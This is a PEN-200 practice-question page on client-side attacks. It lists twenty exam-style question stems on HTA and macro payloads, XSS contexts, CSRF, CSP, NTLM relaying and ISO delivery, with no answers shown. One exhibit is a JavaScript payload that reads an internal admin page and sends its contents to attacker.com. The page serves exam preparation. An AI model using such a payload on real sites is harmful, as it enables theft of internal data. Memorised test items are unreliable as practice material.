Courseiva

PEN-200 · topic practice

Client-Side Attacks practice questions

This domain covers attacking a victim's browser or client application rather than the server directly. On PEN-200 you must build malicious HTA, macro, or library payloads, host them with a web server, and gain code execution when a user opens them. Testing focuses on payload delivery, execution context, and post-exploitation of the client host.

Courseiva uses original exam-style practice questions designed for learning and revision. The goal is to understand the concepts, recognise exam patterns, and improve through explanations — not memorise copied exam dumps.

Editorial oversight:Johnson Ajibi· MSc IT Security, IEEE Senior Member
20 questionsDomain: Client-Side Attacks

What the exam tests

What to know about Client-Side Attacks

You must craft and host client-side payloads, deliver them to a victim, and catch the resulting shell. The single most important thing is matching the payload to the execution context and having the correct handler or web server already running before the target interacts.

Delivering malicious HTA files that run native commands via mshta.exe on Windows targets

Building Microsoft Office macros that invoke PowerShell or cmd for initial execution

Using Metasploit browser exploits and malicious document handlers for client-side code execution

Identifying XSS input contexts such as HTML body, attributes, and script blocks that allow injection

Watch out for

Common Client-Side Attacks exam traps

  • ▸Assuming a malicious file executes without user interaction; most client-side attacks require the victim to open or enable content
  • ▸Forgetting to start the matching listener or web server before sending the payload, so no session returns
  • ▸Testing XSS in only one context and missing attribute, JavaScript, or URL contexts that need different payload syntax

Practice set

Client-Side Attacks questions

20 questions · select your answer, then reveal the explanation

Refer to the exhibit.

```html <script>

var xhr = new XMLHttpRequest();

xhr.open('GET', 'http://internal.admin.local/sensitive', true); xhr.onreadystatechange = function() {

if (xhr.readyState == 4 && xhr.status == 200) {

fetch('http://attacker.com/log?data=' + encodeURIComponent(xhr.responseText));

}
  };

xhr.send(); </script> ```

What type of client-side attack vector is demonstrated in this JavaScript code snippet?

You are reviewing a web application that implements Cross-Origin Resource Sharing (CORS). The server responds with Access-Control-Allow-Origin: * and Access-Control-Allow-Credentials: true. Why is this specific combination considered a severe security misconfiguration?

You are performing a penetration test and successfully inject a script into a user's session via a stored XSS vulnerability. To capture the session cookie even when the 'HttpOnly' flag is enabled, which technique is most effective?

Which TWO of the following conditions are required to execute a successful Cross-Site Request Forgery (CSRF) attack against a target application?

You have identified a reflected XSS vulnerability in a search parameter. The application implements a Content Security Policy (CSP). Which CSP directive, if configured, would most effectively prevent your XSS payload from executing script tags?

Which THREE actions should a penetration tester perform to manually verify a suspected DOM-based XSS vulnerability?

During an authorized penetration test, you must deliver a malicious payload to a Windows user over the internal network. You have already obtained NetNTLMv2 hashes via a poisoned LLMNR response and now want to relay those credentials to a host that does not enforce SMB signing. Which Metasploit module is specifically designed to relay captured SMB credentials to a target host and execute a payload?

You are conducting a client-side attack against a Windows domain user. After sending a malicious link, you capture the user's NetNTLMv2 hash. You now want to crack this hash offline to recover the plaintext password. Which tool is specifically designed to perform this type of password cracking and supports the NetNTLMv2 hash format?

You are performing a client-side attack against a Windows 10 workstation. The target user has Microsoft Office 2016 installed and macro execution is disabled via Group Policy. You need to execute arbitrary code when the user opens a weaponized document. Which technique is most likely to succeed?

During a penetration test, you want to exploit a client-side vulnerability to steal sensitive data from a user's browser. You identify a web application that uses postMessage to communicate with an iframe. The application does not validate the origin of incoming messages. Which technique would best allow you to intercept and read the messages sent by the application to the iframe?

During an authorized penetration test, you need to deliver a client-side payload to a target user via a phishing email. The payload must execute without user interaction beyond opening the email attachment. Which file format is most likely to achieve this on a fully patched Windows 10 system with default settings?

During an authorized penetration test, you want to perform a client-side attack by delivering a malicious HTA file via a phishing email. Which technique is most effective to execute native commands silently when the user opens the file?

You are analyzing a target web application that reflects user input directly into an HTML attribute without proper sanitization. Which vulnerability class should you primarily investigate for exploitation?

During a web application assessment, you discover that the application allows users to upload profile pictures. The server saves these files with their original extensions in a publicly accessible directory. What is the most effective client-side risk associated with this misconfiguration?

You are conducting a client-side attack using a weaponized Microsoft Office document containing a malicious VBA macro. Which user interaction and application setting combination is required for the macro to execute successfully by default?

During an assessment, you identify a Cross-Site Scripting vulnerability that allows you to execute arbitrary JavaScript in the context of a victim user's browser session. What is the primary objective of leveraging this capability against an authenticated user?

When evaluating a web application for Cross-Site Scripting vulnerabilities during a penetration test, which TWO input contexts should you examine because they frequently lead to executable script injection?

You are performing a client-side phishing engagement and need to deliver a malicious payload using an ISO image file. Why is this delivery method often effective against modern Windows security warnings?

Refer to the exhibit.

```http HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline'

<html> <body> <h1>Welcome</h1> <script>var token = '12345';</script> </body> </html> ```

Based on the HTTP response headers and body shown in the exhibit, what significant security risk is present regarding client-side attacks?

When testing for DOM-based XSS, where should you focus your analysis to find the vulnerable code?

Free account

Track your progress over time

Create a free account to save your results and see which topics improve across sessions.

Focused Client-Side Attacks sessions

Start a Client-Side Attacks only practice session

Every question in these sessions is drawn from the Client-Side Attacks domain — nothing else.

Related practice questions

Related PEN-200 topic practice pages

Move into related areas when this topic feels solid.

Frequently asked questions

What does the PEN-200 exam test about Client-Side Attacks?
You must craft and host client-side payloads, deliver them to a victim, and catch the resulting shell. The single most important thing is matching the payload to the execution context and having the correct handler or web server already running before the target interacts.
How should I use these practice questions?
Select your answer before revealing the explanation. Then read why each option is right or wrong — this active recall approach builds retention far faster than re-reading notes.
Can I practise just Client-Side Attacks questions in a focused session?
Yes — the session launcher on this page draws every question from the Client-Side Attacks domain. Use a 10-question session first to gauge your baseline, then move to 20 or 30 once the weak spots are clear.
Where can I practise other PEN-200 topics?
Use the topic links above to move to related areas, or go back to the PEN-200 question bank to see all topics.
Are these real exam questions or dumps?
These are original practice questions written to test the same concepts the PEN-200 exam covers. They are not copied from any real exam or dump site.